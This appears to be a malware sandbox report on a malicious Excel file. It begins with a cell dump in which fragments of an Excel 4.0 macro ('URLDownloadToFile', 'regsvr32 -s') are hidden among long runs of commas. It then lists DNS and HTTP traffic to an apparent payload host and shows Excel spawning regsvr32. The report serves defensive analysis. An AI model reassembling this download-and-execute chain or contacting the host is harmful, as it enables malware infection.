,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,UR,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,LDownl,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,oa,,dToFile,,,,,,,,,,,,,,,,,,,,re,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,gs,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""vr32 -s """,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,JJC,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 11, 2021 12:16:10.141882896 CEST | 49735 | 80 | 192.168.2.4 | 185.180.199.125 |
Jun 11, 2021 12:16:13.319777012 CEST | 49735 | 80 | 192.168.2.4 | 185.180.199.125 |
Jun 11, 2021 12:16:19.382778883 CEST | 49735 | 80 | 192.168.2.4 | 185.180.199.125 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 11, 2021 12:15:53.493258953 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:15:53.551745892 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:15:53.809528112 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:15:53.873652935 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:15:54.708446980 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:15:54.761431932 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:15:55.995307922 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:15:56.066596031 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:15:57.111721039 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:15:57.163543940 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:15:58.253417015 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:15:58.319250107 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:15:59.332068920 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:15:59.385024071 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:00.630373955 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:00.681914091 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:05.749245882 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:05.807897091 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:06.852235079 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:06.940634012 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:07.438770056 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:07.512856007 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:07.771310091 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:07.821919918 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:08.481621027 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:08.540282965 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:09.525120974 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:09.585932016 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:10.231311083 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:10.292875051 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:11.346471071 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:11.405950069 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:11.523520947 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:11.593029976 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:12.497983932 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:12.548055887 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:13.893482924 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:13.943918943 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:14.892127037 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:14.942440987 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:15.660285950 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:15.718601942 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:16.331017971 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:16.381201982 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:18.312237978 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:18.362268925 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:19.281068087 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:19.333925009 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:20.226000071 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:20.276062012 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:21.346118927 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:21.373193026 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:21.407341957 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:21.426676989 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:23.506586075 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:23.578686953 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:23.714297056 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:23.785911083 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:39.888449907 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:40.038907051 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:40.713340044 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:40.774751902 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:41.361578941 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:41.409596920 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:41.438304901 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:41.471177101 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:41.901827097 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:41.963762999 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:42.533973932 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:42.682137966 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:43.247425079 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:43.307027102 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:43.741061926 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:43.799549103 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:44.967226028 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:45.026585102 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:45.903760910 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:45.963625908 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:46.460103035 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:46.518554926 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:48.928911924 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:48.988672972 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:58.783878088 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:58.853579044 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:16:59.096837044 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:16:59.155209064 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:17:01.396725893 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:17:01.456741095 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:17:34.933397055 CEST | 64206 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:17:35.001199961 CEST | 53 | 64206 | 8.8.8.8 | 192.168.2.4 |
Jun 11, 2021 12:17:36.844029903 CEST | 50904 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 11, 2021 12:17:36.902456045 CEST | 53 | 50904 | 8.8.8.8 | 192.168.2.4 |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 12:16:05 |
Start date: | 11/06/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe80000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 12:16:31 |
Start date: | 11/06/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xf30000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|